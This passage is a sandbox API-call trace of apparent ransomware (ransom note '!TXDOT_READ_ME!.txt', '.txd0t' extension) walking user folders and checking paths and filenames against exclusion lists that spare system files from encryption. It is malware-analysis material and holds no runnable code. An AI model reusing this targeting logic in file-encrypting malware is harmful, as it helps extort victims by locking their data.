lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0119.803] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0119.803] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0119.803] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0119.803] StrCmpW (psz1="Music", psz2=".") returned 1 [0119.803] StrCmpW (psz1="Music", psz2="..") returned 1 [0119.803] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.803] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.803] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.803] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0119.803] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.803] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0119.803] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.803] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\boot\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\programdata\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\drivers\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\wsus\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="crypt_detect") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="cryptolocker") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="ransomware") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.804] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files") returned 0x0 [0119.804] GetProcessHeap () returned 0xe30000 [0119.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xef3600 [0119.804] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.804] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\*") returned="C:\\Users\\FD1HVy\\Music\\*" [0119.804] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.804] StrCmpW (psz1=".", psz2=".") returned 0 [0119.804] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.804] StrCmpW (psz1="..", psz2=".") returned 1 [0119.804] StrCmpW (psz1="..", psz2="..") returned 0 [0119.804] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.804] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.805] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.805] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt" [0119.805] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.805] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.805] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.805] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26955360, ftCreationTime.dwHighDateTime=0x1d5ebeb, ftLastAccessTime.dwLowDateTime=0x211fab0, ftLastAccessTime.dwHighDateTime=0x1d5e435, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10af4, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="33TPGnDT5IeW5L2R8Q.wav.txd0t", cAlternateFileName="33TPGN~1.TXD")) returned 1 [0119.805] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2=".") returned 1 [0119.805] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2="..") returned 1 [0119.805] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="33TPGnDT5IeW5L2R8Q.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t" [0119.805] PathFindExtensionW (pszPath="33TPGnDT5IeW5L2R8Q.wav.txd0t") returned=".txd0t" [0119.805] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.805] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.805] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.805] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.805] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="ESQxTLKmutc", cAlternateFileName="ESQXTL~1")) returned 1 [0119.805] StrCmpW (psz1="ESQxTLKmutc", psz2=".") returned 1 [0119.805] StrCmpW (psz1="ESQxTLKmutc", psz2="..") returned 1 [0119.805] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.806] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.806] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="ESQxTLKmutc", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system32\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\local\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\boot\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\perflogs\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\programdata\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\drivers\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\wsus\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="crypt_detect") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="cryptolocker") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="ransomware") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\WINDOWS") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files") returned 0x0 [0119.806] GetProcessHeap () returned 0xe30000 [0119.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xed39f8 [0119.806] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.806] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*" [0119.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.808] StrCmpW (psz1=".", psz2=".") returned 0 [0119.808] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.808] StrCmpW (psz1="..", psz2=".") returned 1 [0119.808] StrCmpW (psz1="..", psz2="..") returned 0 [0119.808] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c0731b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.808] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.808] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.808] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.808] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0119.808] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt" [0119.808] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.808] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.808] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.808] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="OAdJkPb-", cAlternateFileName="")) returned 1 [0119.809] StrCmpW (psz1="OAdJkPb-", psz2=".") returned 1 [0119.809] StrCmpW (psz1="OAdJkPb-", psz2="..") returned 1 [0119.809] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.809] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0119.809] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="OAdJkPb-", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system32\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\local\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\boot\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\perflogs\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\programdata\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\drivers\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\wsus\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="crypt_detect") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="cryptolocker") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="ransomware") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\WINDOWS") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.809] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files") returned 0x0 [0119.809] GetProcessHeap () returned 0xe30000 [0119.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xed90d0 [0119.809] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.809] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*" [0119.809] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0119.810] StrCmpW (psz1=".", psz2=".") returned 0 [0119.810] FindNextFileW (in: hFindFile=0xec19b0, 